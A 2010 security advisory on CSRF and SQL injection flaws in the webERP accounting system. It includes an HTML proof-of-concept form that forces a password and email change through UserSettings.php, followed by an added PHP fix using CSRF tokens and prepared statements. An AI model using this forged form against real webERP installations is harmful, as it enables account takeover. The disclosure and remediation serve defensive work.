# Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (possibly all versions)
# Vendor: http://www.weberp.org
# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application and is available as a free download to
use. The feature set is continually expanding as new businesses and
developers adopt it. There are on average 5,000 downloads per month."
# Credit: Vulnerability found by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerabilities:

1) CSRF: An attacker can add a new administrator to the system. All files
have this issue. See the PoC section.

2) SQL Injection: The application suggests disabling magic_quotes_gpc.
An attacker can inject SQL if the CSRF vulnerability is exploited. HTTP
requests must be filtered.

# PoC (CSRF):

<html>
<body>
<form method="POST" action="http://server/UserSettings.php?">
<input type="hidden" name="RealName" value="ADEO-Security">
<input type="hidden" name="DisplayRecordsMax" value="10">
<input type="hidden" name="Language" value="en_US">
<input type="hidden" name="Theme" value="green">
<input type="hidden" name="pass" value="adeopass">
<input type="hidden" name="passcheck" value="adeopass">
<input type="hidden" name="email" size=40 value="hacked@weberp.org">
<input type="hidden" name="Modify" value="Modify">
</form>
</body>
</html>
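The two issues above share one root cause: UserSettings.php (and, per the advisory, every other form handler) accepts a POST from any origin and passes the field values into SQL. The following PHP is an added example written for this advisory, not webERP's own code, showing the fix a defender would apply to such a handler: a per-session synchronizer token that a cross-site page cannot know, checked in constant time, plus a parameterised UPDATE so the query no longer depends on magic_quotes_gpc or hand escaping. The table name www_users, its column names, and the PHP 7+ functions random_bytes() and password_hash() are assumptions for illustration; the field names are the ones from the PoC form.

```php
<?php
// Added example (not webERP's code): CSRF token + prepared statement for a
// UserSettings.php-style handler. Table/column names are assumed.
session_start();

// One unguessable token per session, embedded in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));   // PHP 7+
    }
    return $_SESSION['csrf_token'];
}

// Reject the request unless the submitted token matches the session token.
// hash_equals() compares in constant time so the check does not leak timing.
function csrf_check(array $post): bool {
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Apply the settings only for the already-authenticated user ($userId comes
// from the session, never from the request), with every value bound as a
// parameter so no input is ever concatenated into the SQL text.
function save_user_settings(mysqli $db, string $userId, array $post): bool {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !csrf_check($post)) {
        http_response_code(403);          // forged or token-less request
        return false;
    }
    $required = ['RealName', 'DisplayRecordsMax', 'Language', 'Theme', 'email', 'pass', 'passcheck'];
    foreach ($required as $field) {
        if (!isset($post[$field])) {
            return false;
        }
    }
    if ($post['pass'] !== $post['passcheck']) {
        return false;
    }
    // Assumed schema: www_users(userid, realname, displayrecordsmax, language, theme, email, password)
    $stmt = $db->prepare(
        'UPDATE www_users SET realname = ?, displayrecordsmax = ?, language = ?, '
        . 'theme = ?, email = ?, password = ? WHERE userid = ?'
    );
    if ($stmt === false) {
        return false;
    }
    $hash = password_hash($post['pass'], PASSWORD_DEFAULT);   // never store plaintext
    $max  = (int) $post['DisplayRecordsMax'];
    $stmt->bind_param(
        'sisssss',
        $post['RealName'], $max, $post['Language'], $post['Theme'],
        $post['email'], $hash, $userId
    );
    return $stmt->execute();
}

// Form rendering: the hidden csrf_token field is what the attacker's page in
// the PoC above cannot supply, so the forged POST is refused with 403.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    echo '<form method="POST" action="UserSettings.php">';
    echo '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
    echo '<input type="text" name="RealName"> ';
    echo '<input type="submit" name="Modify" value="Modify">';
    echo '</form>';
}
```

With this in place the PoC form still reaches the server, but it carries no csrf_token (the token lives only in the victim's session and in pages served to the victim), so csrf_check() fails before any database write. Marking the session cookie SameSite=Lax or Strict and checking the Origin header are worthwhile additional layers, but the token check is the one that works in every browser.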